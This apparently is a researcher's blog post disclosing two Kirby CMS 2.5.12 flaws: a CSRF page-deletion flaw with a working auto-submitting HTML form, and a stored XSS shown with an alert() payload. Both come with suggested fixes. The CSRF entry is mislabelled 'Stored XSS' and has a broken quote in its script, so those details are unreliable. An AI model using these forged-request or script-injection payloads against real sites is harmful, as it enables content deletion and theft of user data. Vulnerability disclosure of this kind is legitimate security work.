Headline
CVE-2018-14519: Zaran's Security Research Blog
An issue was discovered in Kirby 2.5.12. The delete page functionality suffers from a CSRF flaw. A remote attacker can craft a malicious CSRF page and force the user to delete a page.
Cross Site Request Forgery - Kirby CMS
Cross Site Request Forgery - Kirby CMS
By- Zaran Shaikh
Hi Readers,
Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.
Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Cross Site Request Forgery.
Title of the Vulnerability: Stored XSS
Vulnerability Class: Web Application Exploits.
Technical Details & Description: The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages.
CVE ID allocated: - Undisclosed.
Product & Service Introduction: Kirby CMS
Steps to Re-Produce –
Visit the applicationGo to add page optionCreate a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted
4. Payload:
<html>
<body>
<script>history.pushState('’, '’, ‘/’)</script>
<form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
<input type="hidden" name="_redirect" value="site/subpages" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Exploitation Technique: A attacker can inject perform severe actions including account takeover.
Severity Level: High
Security Risk:
The presence of such a risk can lead to data loss,privilege escalation etc.
Affected Product Version: Kirby 2.5.12
Solution - Fix & Patch: The application code should be configured to implement anti csrf tokens.
POCs:
Stored XSS - Kirby CMS
By- Zaran Shaikh
Hi Readers,
Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.
Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Stored Cross Site Scripting
Title of the Vulnerability: Stored XSS
Vulnerability Class: Web Application Exploits.
Technical Details & Description: The application allows user injected payload which can lead to Stored Cross Site Scripting.
CVE ID allocated: - Undisclosed.
Product & Service Introduction: Kirby CMS
Steps to Re-Produce –
Visit the applicationGo to add page optionUnder title, enter any XSS payload like: <script>alert("XSS");</script>Upon the payload being injected, the subsequent page is triggered with XSS.
Exploitation Technique: A attacker can inject malicious xss payloads to steal user data.
Severity Level: High
Security Risk:
The presence of such a risk can lead to data loss, xss shell uploads etc
Affected Product Version: Kirby 2.5.12
Solution - Fix & Patch: The application code should be configured to implement strict input validation to prevent XSS payloads.
POCs: